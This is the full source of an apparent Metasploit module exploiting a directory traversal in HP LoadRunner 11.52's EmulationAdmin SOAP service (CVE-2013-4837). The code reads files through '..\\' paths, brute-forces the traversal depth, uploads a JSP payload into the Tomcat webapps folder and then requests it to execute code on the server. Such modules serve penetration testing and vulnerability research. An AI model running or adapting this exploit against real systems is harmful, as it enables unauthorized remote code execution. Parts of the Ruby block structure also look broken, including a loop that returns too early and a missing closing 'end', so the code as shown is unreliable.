HP LoadRunner EmulationAdmin Web Service Directory Traversal

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }

include REXML

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal',

'Description' => %q{

This module exploits a directory traversal vulnerability on the version 11.52 of HP

LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically

in the copyFileToServer method, allowing to upload arbitrary files. This module has

been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2.

},

'Author' =>

[

'rgod <rgod[at]autistici.org>', # Vulnerability Discovery

'juan vazquez' # Metasploit module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'CVE', '2013-4837' ],

[ 'OSVDB', '99231' ],

[ 'BID', '63475' ],

[ 'ZDI', '13-259' ],

[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437' ]

],

'Privileged' => true,

'Platform' => 'win',

'Arch' => ARCH_JAVA,

'Targets' =>

[

[ 'HP LoadRunner 11.52', { } ],

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Oct 30 2013'))

register_options(

[

Opt::RPORT(8080),

# By default files dropped into C:\windows\system32\null\

OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 3 ]),

# By default HP LoadRunner installed on C:\Program Files\HP\LoadRunner

OptString.new('INSTALLPATH', [ true, 'HP LoadRunner Install Path (from the root folder)', "Program Files\\HP\\LoadRunner" ])

], self.class)

end

def get_soap_request(action, opts={})

path_param = opts[:path]

contents_param = opts[:contents]

se_name = ''

case action

when :upload

se_name = 'ser:copyFileToServer'

when :read

se_name = 'ser:getFileContentAsLines'

end

xml = Document.new

xml.add_element(

"soapenv:Envelope",

{

'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",

'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",

'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",

'xmlns:ser' => "http://service.emulation.ws.mercury.com"

})

xml.root.add_element("soapenv:Header")

xml.root.add_element("soapenv:Body")

body = xml.root.elements[2]

body.add_element(

se_name,

{

'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"

})

ser = body.elements[1]

ser.add_element("in0", {'xsi:type' => 'xsd:int'})

ser.elements['in0'].text = 30000 + rand(30000)

ser.add_element("in1", {'xsi:type' => 'xsd:string'})

ser.elements['in1'].text = path_param

if action == :upload

ser.add_element("in2", {'xsi:type' => "xsd:base64Binary"})

ser.elements['in2'].text = Rex::Text.encode_base64(contents_param)

end

xml.to_s

end

def check

depth = datastore['DEPTH']

install_path = datastore['INSTALLPATH']

print_status("#{peer} - Detecting tomcat version...")

tomcat_version = get_tomcat_version

if tomcat_version

print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...")

location = ""

location << install_path

location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")

location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"

res = read_file(depth, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/

print_good("#{peer} - Traversal exists and parameters are correct...")

return Exploit::CheckCode::Vulnerable

elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/

print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")

return Exploit::CheckCode::Appears

else

print_status("#{peer} - Failed to verify the directory traversal...")

end

else

print_error("#{peer} - Tomcat version not detected...")

end

print_status("#{peer} - Checking if the vulnerable web service and method exist...")

res = send_request_cgi({

'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'),

'vars_get' => { 'wsdl' => 1 }

})

if res and res.code == 200 and res.body.to_s =~ /wsdl.*EmulationAdmin/ and res.body.to_s =~ /copyFileToServerRequest/

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

end

def exploit

depth = datastore['DEPTH']

install_path = datastore['INSTALLPATH']

print_status("#{peer} - Retrieving the Tomcat version used...")

tomcat_version = get_tomcat_version

if tomcat_version.nil?

fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used")

else

print_good("#{peer} - Tomcat #{tomcat_version} found")

end

print_status("#{peer} - Verifying parameters to exploit the directory traversal...")

brute_force = false

location = ""

location << install_path

location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")

location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"

res = read_file(depth, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/

print_good("#{peer} - Traversal parameters are correct")

elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/

print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...")

brute_force = true

else

fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters")

end

if brute_force

print_status("#{peer} - Trying to brute force the traversal depth...")

depth = brute_force_depth(location)

if depth.nil?

fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH")

end

print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...")

end

jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"

# It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests

print_status("#{peer} - Uploading the JSP payload...")

res = upload_file(depth, location, jsp_name, payload.encoded)

if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/

print_status("#{peer} - JSP payload uploaded successfully")

register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}")

else

fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")

end

print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...")

send_request_cgi({

'uri' => normalize_uri('ServiceEmulation', jsp_name),

'method' => 'GET'

}, 1)

end

def send_request_soap(soap_request)

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, 'ServiceEmulation', 'services', 'EmulationAdmin'),

'method' => 'POST',

'ctype' => 'text/xml; charset=UTF-8',

'data' => soap_request,

'headers' => {

'SOAPAction' => '""',

}

})

return res

end

def upload_file(traversal_depth, location, file_name, contents)

path = "..\\" * traversal_depth

path << location

path << "\\" unless location[-1] == "/" or location[-1] == "\\"

path << file_name

req = get_soap_request(:upload, {:path => path, :contents => contents})

return send_request_soap(req)

end

def read_file(traversal_depth, location, file_name)

path = "..\\" * traversal_depth

path << location

path << "\\" unless location[-1] == "/" or location[-1] == "\\"

path << file_name

req = get_soap_request(:read, {:path => path})

return send_request_soap(req)

end

def brute_force_depth(location)

10.times do |i|

res = read_file(i, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/

return i

end

return nil

end

def get_tomcat_version

res = send_request_cgi({

'uri' => normalize_uri('webdav')

})

if res and res.code == 200 and res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/

return $1

end

return nil

end